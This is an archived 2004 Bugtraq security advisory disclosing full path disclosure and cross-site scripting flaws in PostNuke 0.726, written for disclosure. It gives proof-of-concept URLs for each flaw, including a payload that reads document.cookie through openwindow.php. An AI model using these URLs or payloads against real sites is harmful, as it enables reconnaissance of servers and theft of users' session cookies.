[waraxe-2004-SA#022 - Multiple vulnerabilities in PostNuke 0.726 Phoenix - part 2]

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: [waraxe-2004-SA#022 - Multiple vulnerabilities in PostNuke 0.726 Phoenix - part 2]
From: Janek Vind <come2waraxe@xxxxxxxxx>
Date: 21 Apr 2004 23:51:19 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm




{================================================================================}
{                              [waraxe-2004-SA#022]                             
 }
{================================================================================}
{                                                                               
 }
{        [ Multiple vulnerabilities in PostNuke 0.726 Phoenix - part 2 ]        
 }
{                                                                               
 }
{================================================================================}
                                                                                
                                                
Author: Janek Vind "waraxe"
Date: 21. April 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=22


Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

PostNuke: The Phoenix Release (0.7.2.6)

PostNuke is an open source, open developement content management system
(CMS).  PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and
provides many enhancements and improvements over the PHP-Nuke system.  PostNuke
is still undergoing development but a large number of core functions are now
stabilising and a complete API for third-party developers is now in place.
If you would like to help develop this software, please visit our homepage
at http://noc.postnuke.com/
You can also visit us on our IRC Server irc.postnuke.com channel
        #postnuke-support
        #postnuke-chat
        #postnuke
Or at the Community Forums located at:
http://forums.postnuke.com/


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A. Full path disclosure:

A1 - all blocks in "includes/blocks/" directory are not secured against direct 
access

Example:

http://localhost/postnuke0726/includes/blocks/finclude.php
Fatal error: Call to undefined function: pnsecaddschema() in 
D:\apache_wwwroot\postnuke0726\includes\blocks\finclude.php on line 44


A2 - many scripts in "pnadodb" directory are not secured against direct access

Example:


http://localhost/postnuke0726/pnadodb/drivers/adodb-access.inc.php

Warning: main(ADODB_DIR/drivers/adodb-odbc.inc.php): failed to open stream: No 
such file or directory in 
D:\apache_wwwroot\postnuke0726\pnadodb\drivers\adodb-access.inc.php on line 14

Warning: main(): Failed opening 'ADODB_DIR/drivers/adodb-odbc.inc.php' for 
inclusion (include_path='.;c:\php4\pear') in 
D:\apache_wwwroot\postnuke0726\pnadodb\drivers\adodb-access.inc.php on line 14

Fatal error: Class adodb_access: Cannot inherit from undefined class adodb_odbc 
in D:\apache_wwwroot\postnuke0726\pnadodb\drivers\adodb-access.inc.php on line 
19


A3 - full path disclosure in "NS-NewUser" module


http://localhost/postnuke0726/modules/NS-NewUser/user.php

Fatal error: Call to undefined function: modules_get_language() in 
D:\apache_wwwroot\postnuke0726\modules\NS-NewUser\user.php on line 31


A4 - full path disclosure in "NS-Your_Account" module

http://localhost/postnuke0726/modules/NS-Your_Account/user/links/links.changehome.php
http://localhost/postnuke0726/modules/NS-Your_Account/user/case/case.changehome.php?op=edithome


A5 - full path disclosure in "NS-LostPassword" module

http://localhost/postnuke0726/modules/NS-LostPassword/user.php


A6 - full path disclosure in "NS-Multisites" module

http://localhost/postnuke0726/modules/NS-Multisites/chgtheme.inc.php
http://localhost/postnuke0726/modules/NS-Multisites/head.inc.php
http://localhost/postnuke0726/modules/NS-Multisites/print.inc.php


A7 - full path disclosure in "NS-User" module

http://localhost/postnuke0726/modules/NS-User/tools.php
http://localhost/postnuke0726/modules/NS-User/user.php



B. Cross-site scripting aka XSS:

XSS exploits works on PostNuke only if special anti-filtering measures are used!

B1 - XSS in "Downloads" module (2 cases)

http://localhost/postnuke0726/modules.php?op=modload&name=Downloads&file=index&req=ratedownload&ttitle=x&lid=>[xss
 code here]
http://localhost/postnuke0726/modules.php?op=modload&name=Downloads&file=index&req=search&query=>[xss
 code here]

B2 - XSS in "Web_Links" module

http://localhost/postnuke0726/modules.php?op=modload&name=Web_Links&file=index&req=search&query=>[xss
 code here]


B3 - XSS in "openwindow.php" script

http://localhost/postnuke0726/javascript/openwindow.php?hlpfile=x<html><body>[xss
 code here]
http://localhost/postnuke0726/javascript/openwindow.php?hlpfile=x<html><body%20onload=alert(document.cookie);>



Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Greets to torufoorum members and to all bugtraq readers in Estonia! 
Tervitused!
Special greets to UT Bee Clan members at http://bees.tk ! "Control point 
secured!" ;)



Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    come2waraxe@xxxxxxxxx
    Janek Vind "waraxe"

    Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ] ------------------------------------

Prev by Date: Re: Idea of CAW (Creation of Attack Wood)
Next by Date: NetBSD Security Advisory 2004-006: TCP protocol and implementation vulnerability
Previous by thread: Re: Advanced Guestbook 2.2 -- SQL Injection Exploit
Next by thread: NetBSD Security Advisory 2004-006: TCP protocol and implementation vulnerability
Index(es):
- Date
- Thread